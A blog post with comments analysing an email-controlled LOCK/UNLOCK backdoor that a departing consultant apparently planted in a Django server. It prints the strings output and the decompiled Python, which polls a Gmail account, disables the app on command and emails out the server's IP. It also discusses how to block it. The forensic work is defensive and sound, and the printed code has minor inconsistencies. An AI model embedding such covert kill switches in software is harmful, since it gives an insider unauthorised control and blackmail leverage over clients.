[Your worst enemy: The rogue consultant/admin] py_util.pyc LOCK/UNLOCK backdoor over email

I recently had to actually do a fast forensic job for a friend, he asked me some help as he was taking over some business which were “abandoned” by an “open source consultant” which is to say pretty much installs everything on linux and does half coding in this case.

The problem raised when as soon as they took over the network within the hour a critical system for the business stopped working, this was more than suspicious as before in another business that was also admin by this person before had some files erased and configurations lost when it was transitioned to another admin because of lack of administration and ethics on the admin part.

First I tried to decompile the python files form the Django server, this was because obviously all the servers where blocked but for port 80. My friend innocently forgot to block all access to the internet as he thought that was not that hardcore important (#FAIL) and he didn’t really think this person (who know actually is consulting for a major bank in Mexico) would backdoor and do this type of stuff.

The first thing was to run it on strings to figure out what is there (credentials and paths removed for security reasons):

fsckOSX:~ nahual$ strings py_util.pyc
EmailMultiAlternatives(
MIMEImage(
datetimeN(
Parsers
fxxxxxxxxxxo@gmail.comt
mxxxgyyczzt
LOCKSYSTEMt
UNLOCKSYSTEMt
GETIPs$
/home/xxxxxxx/svn/yyyyyyyy/.python.logc
pop.gmail.comi
Subjectt
bloqueandot
desbloqueandot8
2baa224d0a3515912218fd88c1dd9d90d347c451c67811ac6240f4a1(
poplibt
POP3_SSLt
usert
pass_t
passwdt
Exceptiont
lent
listt
ranget
retrt
joinR
parsestrt
LOCKt
opent
file_logt
writet
closet
UNLOCKR
check_ipt
quit(
errt
numerot
responset
headerLinest
bytest
mensajet
emailt
subjectt
/home/xxxxxxx/svn/yyyyyyy/../yyyyyyy/py_util.pyt
check_locker
setup_environ(
BeautifulSoups
hxxxxxxx3@gmail.comR

http://www.cualesmiip.comt

divt
miipt
IP del servidort
from_emails
text/html(
urllib2t
django.core.managementR/
xml.dom.minidomR0
settingst
urlopent
readt
findt
findAllR
DEFAULT_FROM_EMAILt
attach_alternativet
send(
xmlR0
listmailt
contentt
feedR&
html_contentR,
msg(
/home/xxxxxxx/svn/yyyyyy/../yyyyyy/py_util.pyR
__main__(
django.core.mailR
email.MIMEImageR
smtplibR
email.ParserR
__name__(
/home/xxxxxxxx/svn/yyyyyy/../yyyyy/py_util.pyt

fsckOSX:~ nahual$

py_util.pyc wouldn’t fastly decompile, thus after putting it into IDA and other nice decompile this is what was found (credentials removed for security reasons):


from django.core.mail import EmailMultiAlternatives
from email.MIMEImage import MIMEImage
from datetime import datetime
import smtplib
import poplib
from email.Parser import Parser

user = 'xxxxxx'
passwd = 'xxxxxxxx'
LOCK = 'LOCKSYSTEM'
UNLOCK = 'UNLOCKSYSTEM'
GETIP = 'GETIP'
file_log = '/home/xxxxx/svn/yyyyyy/.python.log'

def check_locker():
try:
m = poplib.POP3_SSL('pop.gmail.com', 995)
m.user(user)
m.pass_(passwd)
except Exception, err:
print err
else:
numero = len(m.list()[1])
for i in range(numero):
(response, headerLines, bytes) = m.retr(i + 1)
mensaje = '\n'.join(headerLines)
p = Parser()
email = p.parsestr(mensaje)
subject = email['Subject']
if (subject == LOCK):
print 'bloqueando'
f = open(file_log, 'w')
f.write('')
f.close()
elif (subject == UNLOCK):
print 'desbloqueando'
f = open(file_log, 'w')
f.write('xxxxxxxxxxxxx')
f.close()
elif (subject == GETIP):
check_ip()
m.quit()

def check_ip():
import urllib2
from django.core.management import setup_environ
import xml.dom.minidom
from BeautifulSoup import BeautifulSoup
import settings
setup_environ(settings)
listmail = ['xxxxxxxx@gmail.com']
content = ''
feed = urllib2.urlopen('http://www.google.com')
response = BeautifulSoup(feed.read())
html_content = response.find('div', {'id': 'miip'}).findAll('b')[0]
subject = 'IP del servidor'
msg = EmailMultiAlternatives(subject, content, to=listmail, from_email=settings.DEFAULT_FROM_EMAIL)
msg.attach_alternative(html_content, 'text/html')
msg.send()
if (__name__ == '__main__'):
check_ip()

As you can see the backdoor is pretty small and “efficient”, it checks a gmail account, if an email to that account is sent with the LOCKSYSTEM it will automatically shutdown the application, and you can of course unlock the system with another email.

This might be coded because they thought maybe the client wouldn’t pay them? why would he code something like this without the client consent? no documentation was delivered from the code, and as soon as the admin/developer was let go, the system was shutdown within the hour, sounds to me more like a blackmail function than a current admin function as it only turns off the system, no backups anything.

This makes me wonder why this would be created? or executed? I thought about writing a fast and ugly rule to make sure if anything happened like this again at least the snorts would be alerted and told my friend to lock down the firewall rules, but this lack of ethics is overwhelming, I wonder what the bank would think of him being used to backdoor stuff to keep a foot in the door? jeeeeezzzzz

Snort rule would not really work as it’s doing pop3 over SSL, but then blocking port 993 should lock him out, still … why people do this? don’t they understand this lack of ethics is preposterous?

If you like it, Share!

4 Comments  to  [Your worst enemy: The rogue consultant/admin] py_util.pyc LOCK/UNLOCK backdoor over email

  1. zodman says:

    lo hubieses puesto con gist.github.com para que se vea mejor

  2. depython.net no lo decompilo :P solo me daba una salida en blanco :) interesante no?

  3. Ivan Zenteno says:

    This is really interesting, because I don’t know why the owner of the code do not made a claim to public ministry.
    This people need a lesson of ethic.

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>